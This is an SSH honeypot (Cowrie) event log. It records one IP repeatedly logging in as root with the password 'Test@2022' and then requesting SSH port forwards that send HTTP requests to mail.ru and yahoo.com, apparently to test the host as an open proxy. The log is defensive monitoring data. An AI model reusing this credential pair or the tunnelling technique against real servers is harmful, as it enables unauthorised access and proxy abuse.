{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:31.841095Z","src_ip":"77.83.207.83","session":"01281542dfb6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.088758Z","src_ip":"77.83.207.83","session":"01281542dfb6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23416,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23416","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.139349Z","session":"01281542dfb6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.189126Z","src_ip":"77.83.207.83","session":"01281542dfb6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":15893,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15893","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.332048Z","session":"01281542dfb6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.381841Z","src_ip":"77.83.207.83","session":"01281542dfb6"}
{"eventid":"cowrie.session.closed","duration":"302.1","message":"Connection lost after 302.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.387826Z","src_ip":"212.227.235.229","session":"2dbdbeb90289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":15810,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15810","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.524071Z","session":"01281542dfb6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.573909Z","src_ip":"77.83.207.83","session":"01281542dfb6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.625015Z","src_ip":"77.83.207.83","session":"01281542dfb6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24549,"dst_ip":"1.2.3.4","dst_port":22,"session":"a801407df3cf","protocol":"ssh","message":"New connection: 77.83.207.83:24549 (1.2.3.4:22) [session: a801407df3cf]","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.674041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.675295Z","src_ip":"77.83.207.83","session":"a801407df3cf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.725317Z","src_ip":"77.83.207.83","session":"a801407df3cf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:32.973928Z","src_ip":"77.83.207.83","session":"a801407df3cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23773,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23773","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.025538Z","session":"a801407df3cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.075401Z","src_ip":"77.83.207.83","session":"a801407df3cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17288,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17288","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.216169Z","session":"a801407df3cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.266039Z","src_ip":"77.83.207.83","session":"a801407df3cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":9312,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9312","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.408100Z","session":"a801407df3cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.458122Z","src_ip":"77.83.207.83","session":"a801407df3cf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.509046Z","src_ip":"77.83.207.83","session":"a801407df3cf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24637,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b0b05b2bae3","protocol":"ssh","message":"New connection: 77.83.207.83:24637 (1.2.3.4:22) [session: 7b0b05b2bae3]","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.557718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.558871Z","src_ip":"77.83.207.83","session":"7b0b05b2bae3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.609064Z","src_ip":"77.83.207.83","session":"7b0b05b2bae3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.858003Z","src_ip":"77.83.207.83","session":"7b0b05b2bae3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31743,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31743","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.909538Z","session":"7b0b05b2bae3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:33.959569Z","src_ip":"77.83.207.83","session":"7b0b05b2bae3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":10645,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10645","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.100130Z","session":"7b0b05b2bae3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.149993Z","src_ip":"77.83.207.83","session":"7b0b05b2bae3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":4362,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4362","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.292247Z","session":"7b0b05b2bae3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.342210Z","src_ip":"77.83.207.83","session":"7b0b05b2bae3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.392891Z","src_ip":"77.83.207.83","session":"7b0b05b2bae3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24746,"dst_ip":"1.2.3.4","dst_port":22,"session":"e59ce5442566","protocol":"ssh","message":"New connection: 77.83.207.83:24746 (1.2.3.4:22) [session: e59ce5442566]","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.442858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.443692Z","src_ip":"77.83.207.83","session":"e59ce5442566"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.494097Z","src_ip":"77.83.207.83","session":"e59ce5442566"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.744724Z","src_ip":"77.83.207.83","session":"e59ce5442566"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15254,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15254","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.797021Z","session":"e59ce5442566"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.847522Z","src_ip":"77.83.207.83","session":"e59ce5442566"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":20910,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20910","sensor":"my-vps","timestamp":"2025-08-31T03:51:34.988590Z","session":"e59ce5442566"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.038789Z","src_ip":"77.83.207.83","session":"e59ce5442566"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":25009,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:25009","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.180528Z","session":"e59ce5442566"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.230830Z","src_ip":"77.83.207.83","session":"e59ce5442566"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.281703Z","src_ip":"77.83.207.83","session":"e59ce5442566"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":24885,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd4dc92de069","protocol":"ssh","message":"New connection: 77.83.207.83:24885 (1.2.3.4:22) [session: cd4dc92de069]","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.330005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.330989Z","src_ip":"77.83.207.83","session":"cd4dc92de069"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.380918Z","src_ip":"77.83.207.83","session":"cd4dc92de069"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.629034Z","src_ip":"77.83.207.83","session":"cd4dc92de069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16582,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16582","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.679955Z","session":"cd4dc92de069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.729756Z","src_ip":"77.83.207.83","session":"cd4dc92de069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":32700,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32700","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.872069Z","session":"cd4dc92de069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:35.921751Z","src_ip":"77.83.207.83","session":"cd4dc92de069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":31736,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:31736","sensor":"my-vps","timestamp":"2025-08-31T03:51:36.064110Z","session":"cd4dc92de069"}
